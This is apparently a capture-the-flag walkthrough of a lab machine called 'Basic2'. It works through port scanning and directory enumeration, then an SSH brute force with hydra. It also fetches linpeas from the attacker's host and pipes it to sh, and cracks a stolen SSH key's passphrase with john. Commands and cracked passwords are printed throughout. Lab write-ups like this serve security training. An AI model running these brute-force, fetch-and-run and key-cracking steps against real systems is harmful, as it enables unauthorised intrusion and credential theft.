IP=10.10.88.88
nmap -sV -Pn -vv -oA 'nmap_scans' 10.10.88.88
Output:
# Nmap 7.92 scan initiated Mon Apr 25 06:16:56 2022 as: nmap -sV -Pn -vv -oA nmap_scans 10.10.88.88
Nmap scan report for 10.10.88.88 (10.10.88.88)
Host is up, received user-set (0.024s latency).
Scanned at 2022-04-25 06:16:57 EDT for 15s
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 25 06:17:12 2022 -- 1 IP address (1 host up) scanned in 16.01 seconds
What is the name of the hidden directory on the web server(enter name without /)?
As from above there is a webserver open on 80 - lets investigate it.
The standard site returns a page saying its undergoing maintance. We get this from the source:
<html>
<h1>Undergoing maintenance</h1>
<h4>Please check back later</h4>
<!-- Check our dev note section if you need to know what to work on. -->
</html>
Could be of use later...
Lets run a gobuster scan to see what paths I can enumerate...
gobuster dir -u http://10.10.88.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee scan.txt
Output:
/development (Status: 301) [Size: 316] [--> http://10.10.88.88/development/]
There doesnt seem any website to brute force into so i'll try and brute force the SSH port.
First I need to find the username as without this Hydra will take a while...
Lets use enum4linux
enum4linux -a 10.10.88.88 | tee enum4linux.txt
Here we see:
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
So the user we are trying to crack is jan (as they have the week hash...)
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.88.88 -t 4 ssh -vvv
After a while this returns:
[22][ssh] host: 10.10.88.88 login: jan password: armando
We have our password!
Lets login with SSH
ssh jan@10.10.88.88
Lets enumerate with Linpeas
# Local network
sudo python -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
Within linpeas we find that jan can access kay's directory. Within there we find a private ssh key so copy it over to our attack machine.
└─$ ssh -i ssh_key kay@10.10.88.88
Enter passphrase for key 'ssh_key':
The key needs a passphrase. Lets use johntheripper.
python /usr/share/john/ssh2john.py ssh_key > forjohn.txt
john --wordlist=/usr/share/wordlists/rockyou.txt forjohn.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (ssh_key)
1g 0:00:00:00 DONE (2022-04-25 08:12) 20.00g/s 1654Kp/s 1654Kc/s 1654KC/s behlat..bball40
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We have the ssh password of beeswax - lets use this to login
And we are in!
In Kay's home dir there is one file
kay@basic2:~$ ls
pass.bak
cat pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
This is the final password we need.